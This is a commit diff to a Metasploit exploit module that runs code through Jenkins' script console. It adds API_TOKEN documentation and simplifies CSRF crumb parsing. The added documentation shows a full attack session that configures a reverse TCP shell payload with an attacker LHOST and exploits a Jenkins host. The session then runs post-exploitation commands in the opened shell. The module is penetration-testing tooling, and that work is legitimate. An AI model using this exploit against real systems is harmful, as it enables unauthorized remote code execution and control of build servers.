Added docs, minor code tweak to remove duplication.
parent
49d998f7d9
commit
58cd432120
|
@ -36,7 +36,13 @@
|
||||||
|
|
||||||
A password to an account that has access to the script console. This is only
|
A password to an account that has access to the script console. This is only
|
||||||
necessary if the Jenkins instance has been configured to require
|
necessary if the Jenkins instance has been configured to require
|
||||||
authentication.
|
authentication and you aren't using an API_TOKEN (see below).
|
||||||
|
|
||||||
|
**API_TOKEN**
|
||||||
|
|
||||||
|
An API token to an account that has access to the script console. This is only
|
||||||
|
necessary if the Jenkins instance has been configured to require
|
||||||
|
authentication and you aren't using a PASSWORD (see above).
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
|
@ -128,3 +134,42 @@
|
||||||
meterpreter >
|
meterpreter >
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Example usage against a Linux x64 bit target running Jenkins 2.46.3.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/jenkins_script_console
|
||||||
|
msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
|
||||||
|
RHOST => 172.17.0.1
|
||||||
|
msf exploit(jenkins_script_console) > set RPORT 8080
|
||||||
|
RPORT => 8080
|
||||||
|
msf exploit(jenkins_script_console) > set TARGETURI /
|
||||||
|
TARGETURI => /
|
||||||
|
msf exploit(jenkins_script_console) > set USERNAME admin
|
||||||
|
USERNAME => admin
|
||||||
|
msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
|
||||||
|
API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
|
||||||
|
msf exploit(jenkins_script_console) > set TARGET 1
|
||||||
|
TARGET => 1
|
||||||
|
msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
|
||||||
|
PAYLOAD => linux/x86/shell/reverse_tcp
|
||||||
|
msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
|
||||||
|
LHOST => 10.0.2.4
|
||||||
|
msf exploit(jenkins_script_console) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.0.2.4:4444
|
||||||
|
[*] Checking access to the script console
|
||||||
|
[*] Authenticating with token...
|
||||||
|
[*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
|
||||||
|
[*] 172.17.0.1:8080 - Sending Linux stager...
|
||||||
|
[*] Sending stage (36 bytes) to 172.17.0.2
|
||||||
|
[*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
|
||||||
|
[!] Deleting /tmp/AsqL5Pg payload file
|
||||||
|
|
||||||
|
whoami
|
||||||
|
jenkins
|
||||||
|
id
|
||||||
|
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
|
||||||
|
uname -a
|
||||||
|
Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux
|
||||||
|
```
|
||||||
|
|
|
@ -193,10 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
if res.body =~ /"\.crumb", "([a-z0-9]*)"/
|
if res.body =~ /"\.crumb", "([a-z0-9]*)"/
|
||||||
print_status("Using CSRF token: '#{$1}' (.crumb style)")
|
print_status("Using CSRF token: '#{$1}' (.crumb style)")
|
||||||
@crumb = {:name => '.crumb', :value => $1}
|
@crumb = {:name => '.crumb', :value => $1}
|
||||||
elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
|
elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
|
||||||
print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
|
|
||||||
@crumb = {:name => 'Jenkins-Crumb', :value => $1}
|
|
||||||
elsif res.body =~ /"crumb":"([a-z0-9]*)"/
|
|
||||||
print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
|
print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
|
||||||
@crumb = {:name => 'Jenkins-Crumb', :value => $1}
|
@crumb = {:name => 'Jenkins-Crumb', :value => $1}
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue